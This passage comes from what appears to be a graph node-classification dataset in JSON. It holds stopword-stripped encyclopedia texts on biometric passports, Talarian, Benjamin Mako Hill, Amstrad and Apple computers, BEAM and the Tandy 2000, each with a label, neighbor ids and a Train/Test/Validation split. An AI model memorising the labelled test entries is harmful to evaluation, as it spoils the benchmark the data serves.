years minors 16 years issued since september 2013 contains information passport holder facial features well finger palm prints issued since april 2010 costing ৳ 3450 valid 10 years electronic microprocessor chip embedded e-passport thirty-eight different security features including holographic images embossed thin film laminate change colour light demographic biometric information bearer including fingerprints ten fingers iris scan digital signature stored passport government bangladesh issues three different types e-passports diplomatic passports red cover official passports blue cover regular ordinary passports green cover issued since 15 october 2009 costing 50 km €25.65 valid 10 years adults 5 years younger 18 1 june 2010 bosnia herzegovina issued first eac passport issued since 1 feb 2019 costing 550 bob usd79.13 valid 6 years bolivian epassport functions biometric passports regulations oasi issued since 8 march 2010 issued since december 2006 however december 2010 began issue passports microchips first capital brasília goiás state since end january 2011 last available issued brazil valid 5 years adults costs r 156.07 approximately €35 december 2014 federal police department extended validity document five ten years issued since 17 february 2007 bruneian epassport functions biometric passports issued since 17 july 2014 cost 5-year passport issued children aged five us 80 10-year passport issued people older five costs us 100 issued since 1 july 2013 contains bearer name gender date place birth digital portrait face issued since 26 january 2016 costing €50 noted scheme gradually expand cape verdean diplomatic missions boston lisbon future issued since 2 september 2013 valid 5 years 30 january 2011 ministry foreign affairs people republic china launched trial issuance e-passports public affairs face fingerprint biometric features passport holder digitalized stored pre-installed contactless smart chip passport 1 july 2011 ministry began issuing biometric passports individuals conducting public affairs work overseas behalf chinese government ordinary biometric passports introduced ministry public security starting 15 may 2012 cost passport 200 cny approximately us 31 first-time applicants china 220 cny us 35 renewals passports issued abroad effective july 1 2017 cost biometric ordinary passport reduced 160 cny approximately us 24 first-time applicants renewal april 2017 china issued 100 million biometric ordinary passports issued since 1 september 2015 costing cop 166.000 approx us 51 issued since may 2004 however dominican biometric passports carry chip inside symbol january 2010 cost passport 1,250 dop us 35–40 date issued since 5 february 2007 issued since 21 august 2006 issued since 23 january 2014 issued since 2010 valid 10 years adults costing 100 lari issued tehth business day day issuance cost 205 lari price photo 3 lari needs paid additionally discounts e.g 50 discount persons age 18 issued since 1 march 2010 costing gh¢ 50.00–100.00 adults children passports contain several technological characteristics biometric technology however ghanaian biometric passports carry chip inside symbol mandatory icao-standard electronic passports 2006 immigration department announced unihub limited pccw subsidiary company heading consortium suppliers including keycorp tender provide technology produce biometric passports february 2007 first biometric passport introduced cover new biometric passport remains essentially previous versions addition electronic passport logo bottom however design inner pages changed substantially design conforms document design recommendations international civil aviation organization new epassport featured 2008 stockholm challenge event finalist stockholm challenge award public administration category hong kong sar epassport design praised account multiple state-of-the-art technologies seamlessly integrated sophisticated electronic passport system e-passport system cost hksar passport hk 370 us 48 32-page passport hk 460 us 59 48-page passport issued since 23 may 2006 costing isk5100 isk1900 18 67 india recently initiated first phase deployment biometric e-passport passport holders india abroad new passports designed indigenously central passport organization india security press nashik iit kanpur passport contains security chip personal data digital images initially new passports 64kb chip photograph passport holder subsequently include holder fingerprint biometric passport tested passport readers abroad noted 4-second response time – less us passport 10 seconds passport need carried metal jacket security reasons first needs passed reader generates access keys unlock chip data reader access india also given contract tata consultancy services issuing e-passports passport seva kendra india plans open 77 centers across country issue passports 25 june 2008 indian passport authority issued first e-passport president india pratibha patil e-passport first phase deployment initially restricted diplomatic passport holders available ordinary citizens 2017 onwards issued since 26 january 2011 passport costs rp655,000 66 48-page valid 5 years rp405,000 41 24-page passport valid 5 years issued since july 2007 diplomatic service passports 20 february 2011 ordinary biometric passports cost new passport approximately us 37 irr1,125,000 issued since 1 february 2010 costing 25,000 dinars usd20 issued since october 16 2006 issued since july 2013 2-year pilot period biometric database law optional august 2013 passport expiring 2 years replaced biometric one upon request free charge passports expiring within 2 years charged full fee program review supposed concluded 2015 postponed order minister interior later date due controversy regarding creation biometric database rather storing biometric data within passport chip practice many countries since 2015 pilot period extended 2017 may 2017 pilot period ended newly issued passports required biometric obtain biometric passport applicant must appear interior ministry office photographed special camera records information facial bone structure distance one eyes ears eyes ratio facial features one another one also fingerprinted information contained new high-tech electronic passport issued since march 2006 passports meet requirements us visa waiver program calls countries roll biometric passports 26 october 2006 kazakhstan presented concept implementing biometric passport 2009 issued since 1 september 2017 contain fingerprints facials signature including vital information icao compliant currently likely travel back kenya capture biometric data passport manufacture kenya plans invalidate old style passports 31 august 2020 issued since 31 october 2011 issued since march 2017 late 2018 older non-biometric passports longer valid use issued since september 2016 issued since august 1 2016 date introduction uncertain however enabling statute tabled november 2016 issued since 1 september 2009 issued since 2014 costs 110,000 ariary since september 2014 mandatory malagasy citizens depart country biometric passport issued since 1998 malaysia however member visa waiver program vwp first biometric passport conform standards vwp biometric document malaysian biometric passport issued several years ahead vwp requirement difference lies storage fingerprint template instead fingerprint image chip rest technologies also biometric passport designed read receiving country authorisation malaysian immigration department malaysia started issuing icao compliant passports february 2010 malaysia used issue passports validity 2 years 5 years passport 2 years validity withdrawn since january 2015 pricing malaysian passport rm 200 approximately usd 50 5 years validity rm100 approximately usd 25 senior citizens children 12 hajj pilgrims students 21 studying abroad rm100 free disabled citizens issued since 26 july 2006 new passport follows completely new design features passport holder facial fingerprint information biometric identifiers 32-page ordinary passport cost rf350 64-page ordinary passport cost rf600 children age 10 years people applying passports diplomatic missions abroad issued 32-page non-electronic ordinary passport cost rf250 issued since 2005 smom diplomatic service passports include biometric features compliant icao standards issued since 1 january 2008 costing approximately 760 mdl €45 obligatory 1 january 2011 passport republic moldova biometric data contains chip holds digital information including holder signature well traditional information valid 7 years persons 7 4 years persons less 7 respectively introduced request european union safeguard borders e.u republic moldova issued since 2008 costing approximately €40 issued since end 2016 issued since 6 may 2011 costs us 115.68 valid 5 years issued since 2008 trial general since 25 september 2009 costs 300dh approximately €27 issued since september 2014 issuance passports suspended 40 days later resumed february 2015 issued since 8 january 2018 issued since november 2005 like australia us new zealand using facial biometric identifier two identifying factors small symbol front cover indicating electronic chip embedded passport polycarbonate leaf front version 2009 book inside chip located like australia new zealand installed smartgates airports allow new zealand epassport epassport holders 4 countries australia canada uk us clear immigration controls rapidly facial recognition technology installed immigration gates cost nz 140 applying person nz 124.50 applying online—available already holding passport adults nz 81.70 children valid five years issued december 2015 however 2015 new zealand government approved reinstatement 10-year validity period passports passports issued december 2015 valid 10 years issued since 2007 harmonized ecowas smart electronic passport issued nigerian immigrations service powered biometric technology tandem international civil aviation organization icao specifications international travels travellers data captured biometric passport accessed instantly read security agent spot globe integrated network systems configured linked centrally-coordinated passport data bank managed nigerian immigrations service issued since 2 april 2007 costs 1500 mkd c. €22 issued since 2005 costs nok 450 adults c. €50 nok 270 children 2007 norwegian government launched ‘ multi-modal ’ biometric enrolment system supplied motorola motorola new system enabled multiple public agencies digitally capture store fingerprints 2d facial images signatures passports visas norwegian biometrics company idex asa begun development electronic id cards eid fingerprint security technology use throughout eu issued since end 2014 issued since 2004 without chip inside symbol compliant icao standards since 2012 may 2016 pakistan interior minister launched project officially promised epassports would available fully 2017 citizens issued since 2014 costs 100 21 february 2016 superintendencia nacional de migraciones announced first peruvian biometric passports would delivered 26 february 2016 features new cover along several security improvements order exempted visas schengen area cost pen98.50 approximately usd28 making cheapest passport latin america issued since 11 august 2009 costs ₱950 issued since 20 april 2008 costs qr200 issued since 2006 since august 3 2018 cost 5,000 rubles approximately us 80 use printed data photo fingerprints bac-encrypted biometric passports issued 1 march 2010 valid 10 years russian biometric passports currently issued within russia consulates 1 january 2015 passports contain fingerprints issued since 27 june 2019 compliance new east african community technical specifications well international civil aviation organisation icao among new features include microchip making tamper-proof issued since 4 march 2014 saudi arabia issue biometric passports 26 march 2018 issued since 7 july 2008 costs 3.600 rsd approximately €32 valid 10 years 5 years children aged 3 14 3 years children aged 3 less issued since 15 august 2006 costs 70 sgd applied online mail ica deposit box 80 sgd applied via singapore overseas mission valid 5 years passport complies us visa waiver program issued since 10 october 2006 costs us 100 applied inside somalia us 150 abroad issued since 25 august 2008 costs 55,000 us 55 validity 5 10 years issued since 3 january 2012 new passport valid five years issued since 2008 latest version issued 2014 contains contactless chip biodata card meets icao specifications issued since 10 august 2015 october 2016 new passports require thumbs scanned digital facial mapping photograph taken issuing process issued since may 2009 costs sdg250 approximately us 100 sdg200 students sdg100 children valid 5 years 7 years commercial passport issued since 4 september 2006 costs chf 140.00 adults chf 60.00 children 18 years.. since 1 march 2010 issued passports biometric containing photograph two fingerprints recorded electronically issued since 29 december 2008 costs nt 1,600 ordinary passport either 3 5 10 years validity issued since 1 february 2010 diplomats government officials passports issued 26 may 2005 1 june 2005 limited quantity 100 passports day issued thai citizens however 1 august 2005 full operational service installed thailand became first country asia issue icao compliant biometric passport issued since august 2009 cost 30,000 cfa francs togolese residing abroad price varies tunisia ministry interior stated start issuing biometric passports end year 2016 happen turkish passports compatible european union standards available since 1 june 2010 colours new biometric passports also changed accordingly regular passports claret red special passports bottle green diplomatic passports wrap black colours recently turkish minister state announced government printing new passports government minting office since private contractor failed deliver june 2018 cost issuing 10-year passport turkey ₺764 approximately us 160 turkmenistan became first country ex-ussr mid-asia region issue icao-compliant biometric passport passport available since 10 july 2008 according law ukraine supposed issue biometric passports identity cards 1 january 2013 however become available two years later january 2015 fully compatible european union standards united arab emirates ministry interior began issue biometric passports 11 december 2011 making second gcc state launch biometric passports qatar biometric version u.s. passport sometimes referred electronic passport descriptive data digitized passport photo contactless chips fingerprint information placed onto contactless chip however chip large enough 64 kilobytes inclusion biometric identifiers u.s. department state first issued passports 2006 since august 2007 issues biometric passports non-biometric passports valid expiration dates although system able perform facial-recognition match bearer image stored contactless chip desired unclear system deployed u.s. department homeland security ports entry high level security became priority united states attacks 11 september 2001 high security required cracking counterfeit passports october 2004 production stages high-tech passport commenced u.s. government printing office gpo issued awards top bidders program awards totaled roughly 1,000,000 startup development testing driving force initiative u.s enhanced border security visa entry reform act 2002 also known border security act states smartcard identity cards able replace visas foreigners travelling u.s. wish enter u.s. visa-free visa waiver program vwp required possess machine-readable passports comply international standards additionally travellers holding valid passport issued 26 october 2006 passport must biometric passport used enter u.s. visa-free vwp november 2018 hartsfield-jackson atlanta international airport delta air lines opened nation first curb-to-gate biometric terminal promised improve aviation security moving travelers faster screening uruguayan ministry interior started issue biometric passports uruguayan citizens 16 october 2015 new passport complies standards set forth visa waiver program united states uzbekistan 23 june 2009 islam karimov issued presidential decree measures improve passport system republic uzbekistan 29 december 2009 president uzbekistan signed decree change dates phased exchange populations existing passport biometric passport accordance decree biometric passports phased beginning 1 january 2011 first phase biometric passport issued employees ministries departments agencies republic individuals travel abroad outside country well citizens receive passport connection achievement certain age grounds provided law second phase rest population able get new passports period 2012 2015 issued july 2007 venezuela first latin american country issuing passports including rfid chips along major security improvements chip photo fingerprints data introduced june 2017 icao passport standards related materials open source free tools",
    "neighbors": [
      3456,
      11138,
      8038,
      7402,
      3629,
      3566,
      10831,
      880,
      9745,
      10163,
      3128,
      4313,
      3612,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 10686,
    "label": 7,
    "text": "Talarian:talarian talarian provider real-time infrastructure software part tibco veteran provider message-oriented middleware talarian member business integration group big internet protocol multicast initiative ipmi securities industry middleware council simc object management group omg internet engineering task force ietf smartsockets main product talarian real-time message-oriented middleware mom scalable fault tolerant programming model built specifically offer high-speed interprocess communication ipc multiprocessor architecture scalability reliability supports variety communication paradigms including publish-subscribe adaptive multicast redundant connections peer-to-peer rpc included part smartsockets package graphical tools monitoring debugging applications supported wide range platforms applications using smartsockets developed following languages smartsockets product tibco see acquisition january 2002 tibco acquired talarian approximately 115 million primary competitor delivery high-performance messaging solutions tibco paid 5.30 per share half stock half cash talarian outstanding shares talarian customers large end-users oems systems integrators need solutions real-time data flow supports high information volumes list famous customers",
    "neighbors": [
      1280,
      8122,
      8640,
      9441,
      5384,
      1197,
      7802
    ],
    "mask": "Test"
  },
  {
    "node_id": 10687,
    "label": 2,
    "text": "Benjamin_Mako_Hill:benjamin mako hill benjamin mako hill born december 2 1980 free software activist hacker author contributor free software developer part debian ubuntu projects well co-author three technical manuals subject debian gnu/linux 3.1 bible official ubuntu server book official ubuntu book hill assistant professor communication university washington serves member free software foundation board directors hill master degree mit media lab received phd interdepartmental program involving mit sloan school management mit media lab fall 2013 assistant professor department communication university washington also fellow mit center civic media coordinates development software civic organizing worked advisor contractor one laptop per child project speaker gnu project serves board software freedom international organization organizes software freedom day 2006 married mika matsuzaki used mathematically constrained wedding vows marriage ceremony since 1999 hill active member debian served delegate debian project leader founder coordinator debian non-profit debian custom distribution designed fill needs small non-profit organizations addition served board software public interest march 2003 july 2006 serving organisation vice-president august 2004 hill also core developer founding member ubuntu continues active contributor project addition technical responsibilities coordinated construction community around ubuntu project project community manager later ceding role jono bacon ubuntu first year half period worked full-time canonical ltd within project served community council governance board oversees non-technical aspects project october 2011 work included contributing code conduct diversity statement project addition software development hill writes extensively published academic books magazines newsletters online journals slate magazine republished one blog posts author free software project management howto canonical document managing foss projects published academic work foss anthropological sociological management software engineering perspectives written spoken intellectual property copyright collaboration generally also studied sociology community involvement web communities widely published cited projects like scratch wikipedia talked topics publicly well giving keynote address 2008 oscon hill worked several years consultant foss projects specializing coordinating releases software free open software structuring development efforts encourage community involvement spends significant amount time traveling giving talks foss intellectual property primarily europe north america previous current positions hill pursued research full-time graduate researcher mit media laboratory lab worked electronic publishing computing culture groups collaborative writing decision-making software one project selectricity award-winning voting tool received prizes grants mtv cisco fellow harvard berkman center internet society mit center civic media served advisory board wikimedia foundation advisory council open knowledge foundation board free software foundation founding member ubuntu community council 2009 2019 research symbiont award -- general symbiont",
    "neighbors": [
      1026,
      2050,
      1028,
      5644,
      2581,
      8727,
      4123,
      10780,
      546,
      3618,
      6691,
      2109,
      10817,
      8258,
      3654,
      5703,
      8263,
      10822,
      589,
      1101,
      4177,
      1107,
      8787,
      1112,
      3674,
      4192,
      10851,
      3685,
      9320,
      9324,
      8304,
      7793,
      3189,
      5755,
      5759,
      2180,
      7812,
      4230,
      8326,
      9865,
      8848,
      657,
      11410,
      2195,
      6808,
      1694,
      6302,
      3744,
      8354,
      4265,
      8364,
      3245,
      1717,
      2233,
      9407,
      5833,
      8909,
      6352,
      7384,
      3802,
      10971,
      4831,
      7904,
      1761,
      10464,
      3817,
      4841,
      7913,
      9971,
      8436,
      5369,
      7938,
      4360,
      4367,
      1813,
      7450,
      2332,
      8476,
      10012,
      802,
      5410,
      6947,
      5931,
      6445,
      2864,
      6962,
      823,
      11069,
      843,
      11602,
      4437,
      4951,
      6489,
      5990,
      9579,
      7020,
      1394,
      2930,
      1396,
      7027,
      9074,
      11643,
      3969,
      11654,
      4493,
      10642,
      1939,
      11155,
      11669,
      3478,
      926,
      7584,
      4011,
      11180,
      9646,
      8112,
      5555,
      439,
      9148,
      9660,
      5067,
      975,
      4561,
      467,
      8147,
      2010,
      3550,
      9696,
      8673,
      11232,
      1007,
      8177,
      3068,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 10688,
    "label": 3,
    "text": "Amstrad_PC2286:amstrad pc2286 amstrad 286 pc2286 launched 1989 2000 series launched professional follow pc1512/1640 2000 series consisted 2086 8086 2286 80286 2386 80386dx series used plastic case similar 1512/1640 time main computer unit power supply unit built machines bios setting battery backed however unusually used 4x aa battery mounted top based unit 2286 came 3.5 floppy drives standard side port connecting external 5 1/4 inch disk drive package contained one range monitors screen 12 14 vga mono vga color 16-bit intel 80286 cpu 12.5 mhz 1 mb ram 40 mb vga adaptor supporting mda cga hercules ega mcga evga serial parallel 5.25 inch 3.5 inch fdd mouse",
    "neighbors": [
      4674,
      9166
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10689,
    "label": 3,
    "text": "MOVHPD:movhpd x86 assembly programming language movhpd name specific action performable modern x86 processors 2nd-generation streaming simd extensions sse2 action involves either copying number memory temporary space copying number temporary space memory specifically movhpd causes value 8-byte memory region either copied assigned upper half xmm register source operand either xmm register xmm memory address m64 source operand xmm register destination operand must memory address source operand memory address destination operand must xmm register note lower half xmm register unaffected operation x86 instruction listings",
    "neighbors": [
      6596,
      6025,
      499,
      5844,
      8853,
      1915
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10690,
    "label": 9,
    "text": "BEAM_(Erlang_virtual_machine):beam erlang virtual machine beam virtual machine core erlang open telecom platform otp beam part erlang run-time system erts compiles erlang elixir source code bytecode executed beam beam bytecode files codice_1 file extension originally beam short bogdan erlang abstract machine named bogumil bogdan hausman wrote original version name may also referred björn erlang abstract machine björn gustavsson wrote maintains current version developers worked system ericsson",
    "neighbors": [
      11488,
      8226,
      5031
    ],
    "mask": "None"
  },
  {
    "node_id": 10691,
    "label": 3,
    "text": "Macintosh_Classic:macintosh classic macintosh classic personal computer designed manufactured sold apple computer inc. october 1990 september 1992 first macintosh sell less us 1,000 production classic prompted success macintosh plus macintosh se system specifications classic similar predecessors monochrome crt display 512×342 pixel resolution 4 megabyte mb memory limit older macintosh computers apple decision update classic newer technology 68010 cpu higher ram capacity color display resulted criticism reviewers macworld describing nothing gloat beyond low price unexceptional ensured compatibility mac by-then healthy software base well enabled fit lower price apple intended nevertheless classic featured several improvements aging macintosh plus replaced apple low-end mac computer 25 percent faster plus included apple superdrive floppy disk drive standard classic adaptation jerry manock terry oyama 1984 macintosh 128k industrial design earlier macintosh se apple released two versions ranged price 1,000 1,500 price availability education software led classic popularity education sold alongside powerful macintosh classic ii 1991 discontinuation next year apple co-founder steve jobs left apple 1985 product development handed jean-louis gassée formerly manager apple france gassée consistently pushed apple product line two directions towards openness terms expandability interoperability towards higher price gassée long argued apple market computers towards low end market profits thin instead concentrate high end higher profit margins illustrated concept using graph showing price/performance ratio computers low-power low-cost machines lower left high-power high-cost machines upper right high-right goal became mantra among upper management said fifty-five die referring gassée goal 55 percent profit margin high-right policy led series machines ever-increasing prices original macintosh plans called system around 1,000 time morphed jef raskin original vision easy-to-use machine composing text documents jobs concept incorporating ideas gleaned trip xerox parc mac list price ballooned 2,495 price mac systems continued climb macintosh plus slightly expensive 2,599 se 2,900 3,900 depending model basic macintosh ii 40 mb hard drive least 5,500 launch price increasing late 1988 modern machines cost even macintosh iicx 5,369 iici 6,269 iifx 9,900 without monitors keyboards color crts relatively expensive late 1980s apple 14-inch 640×480 monitor list price 999 apple adb keyboards high quality similarly expensive inexpensive machine lineup late 1980s several-year-old mac plus selling around 1,800 low-left market abandoned years earlier booming turbo xts ignored high end unix workstations likes sun sgi apple fortunes 1980s quickly reversed christmas season 1989 drove point home first decrease sales years accompanying 20 percent drop apple stock price quarter january 1990 gassée resigned authority product development divided among several successors many apple engineers long pressing lower-cost options order build market share increase demand across entire price spectrum gassée rush started quickly introduce series low-cost machines three market points identified low-cost machine aimed costing 1,000 low-cost machine color graphics upscale color machine small business use time would develop classic macintosh lc macintosh iisi unlike '020 '030 based models macintosh classic original macintosh startup sound macweek magazine reported july 10 1990 apple paid 1 million modular computer systems inc. subsidiary daimler-benz ag right use classic name part five-year contract apple renew contract ended macweek speculated macintosh classic would use 8 megahertz mhz motorola 68000 microprocessor display predecessors classic would priced 1,500 2,150 december 12 1990 john sculley apple ceo introduced classic press conference announcing pricing would start 1,000 saying reach new customers n't lower prices existing products redesigned computers ground features customers told us value apple new pricing strategy caused concern among investors thought would reduce profit margins brodie keast apple product marketing manager said prepared whatever takes reach people macintosh ... plan get aggressive price need release classic apple share price closed 27.75 per share 50 cents october 12 1990 far previous 12-month high 50.37 classic released europe japan concurrently united states release japan classic retailed 198,000 yen 1,523 us matching price toshiba dynabook laptop computer spending 40 million marketing classic first-time buyers apple difficulty meeting high demand apple doubled manufacturing space 1990 expanding singapore cork ireland factories classic assembled air freight rather sea shipping used speed delivery shortage caused concern among dealers blamed apple poor business planning macintosh classics lcs given scholastic software 12 weeks officially announced scholastic planned release 16 new macintosh products 1991 peter kelman scholastic publisher predicted macintosh would become school machine nineties classic sold schools 800 availability educational software led classic popularity education sector low-end model sold 1 mb memory 1.44 mb floppy drive hard disk included keyboard 999 high-end model cost 1,499 contained additional 1 mb memory expansion card 40 mb hard disk classic features several improvements macintosh plus replaced apple low-end mac computer 25 percent faster plus fast se includes apple superdrive 3.5 floppy disk drive standard superdrive read write macintosh ms-dos os/2 prodos disks also classic last compact mac use motorola 68000 central processing unit cpu classic uses system 6.0.7 operating system support versions system 7.5.5 hidden hierarchical file system hfs disk volume contained read-only memory rom includes system 6.0.3 mac classic booted system 6.0.3 holding keys boot dealers included software bundle called smartbundle classic also sold separately 349 includes t/maker writenow word processor ashton-tate full impact spreadsheet program recordholderplus database silicon beach software superpaint 2.0 paint draw program macintosh classic final adaptation jerry manock terry oyama macintosh 128k industrial design bringing back elements original retaining little snow white design language used macintosh se design remnant se stripe across front panel bezel floppy drive distinctive front bezel lines se used classic vertical lines around base replaced four horizontal vent lines reminiscent original design also curve front bezel increased radial curve front macintosh lc macintosh iisi screen brightness dial bezel also removed favor software control broad curved front bezel became signature apple product design much 1990s logic board central circuit board computer based macintosh se design size however reduced using surface mount technology 9×5 inches 23×13 cm half size se board redesign absence expansion slots kept manufacturing costs low lack expansion abilities along small screen size macintosh popularity desktop publishing led oddities video displays connected scsi port users seeking connect larger full- dual-page display mac classic design used 1991 classic ii succeeded classic replaced macintosh se/30 reviewers macintosh classic focused processor performance lack expansion slots liza schafer home office computing praised classic ease use price criticized display full us letter page × 11 inches would fit full size warned required high-end graphics desktop publishing capabilities buying classic schafer concluded classic value impressive performance performance get working novel database spreadsheet pc week criticized lack faster processor stating 7.8 mhz speed adequate text applications limited graphics work suitable power users classic appropriate home computer limited computing road similarly pc user review concluded slow processor lack expansion slots macintosh classic offset low prices macweek described fine inexpensive replacement macintosh plus best embodies original macintosh vision six half years later computer gaming world skeptical doubting consumers would purchase black-and-white computer hard drive slightly faster mac plus february 1991 edition electronic learning robert mccarthy wrote teachers educational administrators software developers enthusiastic new lower cost apple macintosh computers steve taffe manager instructional strategy mecc developer publisher educational software explained excitement classic terrific – mac low price everyone afford macintosh scholastic educational software developer also confident apple ability compete ms-dos machines stating cost-effective powerful ms-dos computers apples superior comfort-level sue talley apple manager strategic planning education said classic see going applications need fair number powerful stations color big issue talley mentioned suited writing labs basic productivity uses many schools decided buy macintosh classic lack color monitor option higher-priced macintosh lc popular apple iie card also increased lc appeal schools although classic popular first may 1992 lc 560,000 sold outselling classic 1.2 million",
    "neighbors": [
      2058,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      8767,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      7269,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      209,
      3293,
      9952,
      6884,
      6377,
      2282,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      2839,
      9499,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      10051,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      11118,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      5520,
      1428,
      3483,
      2979,
      11171,
      8109,
      8114,
      446,
      5058,
      1482,
      9166,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      7151,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Train"
  },
  {
    "node_id": 10692,
    "label": 3,
    "text": "Tandy_2000:tandy 2000 tandy 2000 personal computer introduced radio shack september 1983 based 8 mhz intel 80186 microprocessor running ms-dos comparison ibm pc xt introduced march 1983 used older 4.77 mhz 8088 processor ibm pc introduced 1984 would later use newer 6 mhz intel 80286 due 16-bit-wide data bus efficient instruction decoding 80186 tandy 2000 ran significantly faster pc compatibles slightly faster pc later ibm upgraded 80286 new pc models 8 mhz though wait states tandy 2000 company first computer built around intel x86 series microprocessor previous models used z80 68000 cpus touted compatible ibm xt tandy 2000 different enough existing pc software purely text-oriented failed work properly tandy 2000 special version ms-dos supported 768 kb ram significantly 640 kb limit imposed ibm architecture used 80-track double-sided quad-density floppy drives 720 kb capacity ibm standard time introduction tandy 2000 360 kb tandy 2000 tandy trs-80 logos case marking start phaseout trs-80 brand introduction ibm model 5150 personal computer august 1981 created entirely new market microcomputers many hardware software companies founded specifically exploit ibm microsoft new presence standard-setter small computers established manufacturers shifted focus well date tandy/radio shack small-computer market four years since august 1977 introduction trs-80 model new computer division followed october 1979 trs-80 model ii—a high-end business-oriented system 1983 trs-80 model 4 succeeded model iii replaced model consumer educational markets business segment trs-80 model 12 model 16 succeeded model ii adding higher-end features thus far tandy/radio shack computer lines occupied niches market proprietary system software applications tandy attempted monopolize software peripheral sales offering third-party products company stores ibm pc introduced nearest thing industry standard small computers cp/m-80 single manufacturer dominated 1983 ibm pc tandy discouraging third-party products halved company market share stopped profit growth tandy motive moving new ms-dos domain twofold capitalize new market leverage sales opportunities afforded solid position small computers marketing management believed many tandy customers would prefer stay tandy products inevitably seemed made jump onto burgeoning ibm/microsoft bandwagon figured company well-positioned regard large base customers consumer business markets z80-based trs-80 models i/iii/4 68000-based models 12 16 respectively tandy large presence computer retailer several thousand radio shack stores throughout us deemed advantage well pc manufacturers especially ibm relied mainly sales corporate accounts consumer retail tandy/radio shack thus company would become market leader offering hottest new trend—affordable 16-bit computers running ms-dos—directly computing public therefore tandy would produce ibm-style computer running industry-standard ms-dos company decided distinguish similar products producing better computer new machine would aimed mid-price market high-end consumers low-end businesses deemed prudent order seriously cannibalize current product lines serving market segments big-name computer manufacturers made leap pc/ms-dos market half 100 popular pc programs incompatible 2000 including killer app lotus 1-2-3 tandy realize similar non-compatible computers dec ti eagle successful strategy offering high-performance pc genesis tandy 2000 technical specifications rival computers improved pc hardware matched tandy 2000 one two dimensions none offered across-the-board enhancement except noted ran ms-dos incompatible ibm pc hardware level copycat computers competed primarily lower pricing like tandy exploiting installed customer bases tandy described 2000 'next generation true 16-bit cpu speed disk storage expansion ibm pc ms-dos computers admitting 1984 many ms-dos programs support computer company stated popular sophisticated software market available either immediately next six months two models tandy 2000 introduced dual-drive floppy-only model 2,750 2000hd single floppy drive half-height 10 mb hard drive 4,250 dual-floppy model 128 kb ram hard-drive-equipped 2000hd 256 kb comparison time low-end trs-80 model 4 two floppy drives cost 1,999 high-end model 16 two floppy drives cost 4,699 tandy executive ed juge said within six months tandy realized erred 2000 early 1985 infoworld reported tandy introduced tandy 1000 found market prefers true pc compatibility 2000 incomplete compatibility tandy 2000 received lukewarm welcome market computer press inability run popular ms-dos applications anticipated tandy time accepted practice new software created new computer came market also many pc-style computers manufacturers hardware-compatible ibm pc though company supported machine hardware add-ons software tailored specially including bestsellers like lotus 1-2-3 autocad computer failed gain popular acceptance never developed would late 1986 introduction tandy 3000 tandy offered pc-style computer performance comparable tandy 2000 tandy 2000 marketed early 1988 continual price cuts eventually closed 999 remaining unsold computers converted radio shack store operations terminals coincidentally one backup plans original trs-80 model four card slots back could accept expansion boards without need open case using rail system available expansion boards/cards included tandy 2000 nominally bios-compatible ibm xt allowed well-behaved dos software run platforms however dos software time bypassed operating system bios directly accessed hardware especially video external ports achieve higher performance rendering software incompatible tandy 2000 base-model tandy 2000 supported text-mode display monochrome tandy vm-1 monitor used 8-pin video port computer rear panel text-mode address space different location third-party memory-resident software hacks remedied copying pc-compatible text-mode memory tandy 2000 text space rate 5–10 times per second sometimes caused choppiness display produced fast text display rate—often fast read—but 'hold key keyboard could used pause text output bit pattern text character raster image maintained ram could modified user clever programming display ability present fine lines provided 640x400 screen resolution could accessed text mode even without optional graphics board display upgradable support pixel-addressable graphics via tandy 2000 graphics adapter circuit board fit expansion slot connector monochrome vm-1 monitor video connector rear-panel cabinet disabled expansion board installed graphics resolution 640x400 supported high intensity pixels color capability provided color graphics option set chips inserted empty sockets monochrome graphics adapter provided purpose resolution color board 640x400 non-interlaced eight colors palette sixteen available colors displayable tandy cm-1 monitor 799 particularly high-resolution colorful display day cm-1 accepted input color graphics board digital rgbi signals indicating separate red green blue signals intensity bit cga compatibility hit-or-miss three non-tandy monitors worked tandy 2000 graphics card long production original 1986–88 mitsubishi diamond scan nippon electronics corporation nec multisync multisync gs grayscale required horizontal scan frequency tandy 2000 26.4 khz modern flat-screen multisync computer monitors sync frequencies 30 khz cm-1 monitor also digital rgb modern crt monitors analog-only tandy 2000 used quad-density 5.25 floppy disks formatted 720k format 80-track disks double-density bitrate used pc-compatibles although cp/m machines commodore 8050/8250 drives normal pcs time 40-track double-density floppy drives could read quad-density due drive heads wide read narrower tracks 1.2mb 5.25 drives introduced ibm could read quad-density disks 80-track thinner heads various utility programs dos existed allowed nonstandard formats tandy 2000 disks read much like 1.2mb drives tandy 2000 problems reliably writing 360k pc disks due smaller heads completely erasing tracks causing 40-track drives become confused residual magnetic signals outer edge track tandy distributed computer utility called pc-maker would read format 40-track disks 2000s 80-track drives readable drives ordinary pcs floppy controller tandy 2000 accept 3.5 low-density 720 kb floppy drives may 2019 abandonware site winworldpc.com available download disk image latest version ms-dos tandy 2000 includes instructions using ibm 1.2mb 5.25-inch disk drive 80-track create system disk bootable tandy 2000 5.25-inch drive procedure also used create bootable 3.5-inch system disk using ordinary 720kb 3.5-inch pc drive boot tandy 2000 5.25-inch boot drive replaced low-density 720 kb 3.5 inch pc drive keyboard entirely new design made expressly tandy 2000 would later keyboard shipped tandy 1000 successors arrangement function keys changed ibm pc/xt ten left hand side keyboard two columns five tandy among first pc manufacturers change modern arrangement twelve function keys arranged horizontally across top ibm gave nod new standard making arrangement pc-at keyboard serial port hardware completely different pc/xt pc-compatible terminal emulation software either maintain strict bios usage serial hardware else use fossil driver software wrapper virtualized serial hardware see also dec rainbow allowing terminal software work wider variety hardware several terminal programs available tandy 2000 making possible log bbs e-mail remote systems tandy 2000 required specific version ms-dos would run machine standard ms-dos pc dos generic ibm-compatibles 